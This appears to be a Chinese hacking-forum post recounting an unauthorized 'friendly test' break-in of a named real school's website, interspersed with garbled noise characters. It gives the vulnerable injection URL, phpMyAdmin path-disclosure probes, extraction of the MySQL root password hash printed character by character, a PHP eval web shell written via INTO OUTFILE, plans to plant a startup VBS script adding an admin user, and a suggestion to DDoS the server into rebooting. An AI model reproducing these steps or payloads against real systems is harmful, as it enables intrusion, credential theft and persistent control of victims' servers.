友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
6 E; M9 r7 D# K% W. o6 k  u8 m发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

- J# j+ y' r+ l1 ^% C那么想可以直接写入shell ，getshell有几个条件：

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
) x7 e7 g2 H# L( P! \0 _0 N$ |
/ t( u6 e! k' u8 h: V试着爆绝对路径：
8 k3 l7 X) h0 [: Q1./phpMyAdmin/index.php?lang[]=1  
+ w% m( ]4 d; s! g3 G2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
4 X/ B  v( V9 T" m1 ]- Y8 T! s8 N# p8./phpmyadmin/libraries/export/xls.php  

5 o/ p5 e9 \: j) D5 H, ?均不行...........................
: e, l" B0 f( G
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

$ a( T+ g( K* a4 c! e" \4 S; b$ P权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
0 A! v, w: \" `# `* f
默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败
6 d, C7 p' I: i# I
敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
$ ~; y. ?; e0 X7 v7 l+ X
8 J8 j$ F8 n  W% j7 q+ i想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
" R7 V7 `) x& T& @9 Q# F, c5 f
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

, R2 v2 |) P1 X2 G2 Q0 ^7 g自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
$ V  ~7 Z  O: Q1 _
成功读到root密码：

5 t9 y' k& _, S* y: r1 e! m# u17---- r(0072)
18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
22---- 8(0038)
6 M+ I( x+ W8 ], |23---- 2(0032)
; m* p  N4 ~/ ]1 o/ Y* ]24---- E(0045)
. h+ @, F/ ^  \9 C25---- 1(0031)
26---- C(0043)
) R! H9 h) f+ ?/ ?27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
% p; n4 o2 F! {6 l9 n6 f30---- 8(0038)
31---- A(0041)
32---- 9(0039)
33---- B(0042)
34---- 5(0035)
35---- 4(0034)
36---- 8(0038)
- V- e: Z1 E& P0 e. I4 G37---- 6(0036)
38---- 4(0034)
3 ?- \  \" S8 e* E+ O- J8 g39---- 9(0039)
, }9 E) |4 w  j+ V7 `; E40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
8 A: R( Y$ }! W. W5 G43---- 3(0033)
; O- y, ?, W. |44---- 5(0035)
45---- 9(0039)
46---- 8(0038)
47---- F(0046)
' Q$ P- u; B) z6 N48---- F(0046)
49---- 4(0034)
/ u1 I2 X$ F5 _50---- F(0046)
0 d- [) J8 ~* r" i0 l; o51---- 0(0030)
4 U. s8 Z0 M- a3 G# U2 f- _52---- 3(0033)
53---- 2(0032)
6 \. C) O' C+ i, J! _' `54---- A(0041)
55---- 4(0034)
" d0 B, v9 x5 h9 \1 O56---- A(0041)
57---- B(0042)
" O4 o( c) X$ u0 M) ~58---- *(0044)
* E* h  X  t! ~. S5 @59---- *(0035)
60---- *(0041)
& X& W% _+ v' I; d: J8 A; V61---- *0032)
7 N: R9 g7 G* Q. D7 N" Z
解密后成功登陆phpmyamin
/ u+ u9 D$ O% C# J! r5 e                          

                             

! u2 K( e7 O1 S! S( a7 R找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

' O. r5 V# V6 F) Z" o' t- j! K1 _& H) Y成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................
6 Q& ^# ?  @$ ^2 [
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
$ l7 Y/ p1 D/ P2 G% F1 O

服务器上已经有个隐藏帐号了

7 ~( E/ F' P% T6 J0 I5 z5 I' O

别名     administrators
" ?0 \6 s. w8 C7 U3 h/ j注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
admin
Administrator
* ^' P9 `' x  A' C( Pslipper$
' p2 E1 j9 u2 r3 _* b5 F% e5 Psqluser
命令成功完成。
& e* i5 F  ]# o% l
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

ddos服务器重启，不然就只能坐等服务器重启了...............................

+ Q+ A0 }6 W+ M      

; Q* G0 d- s" N; F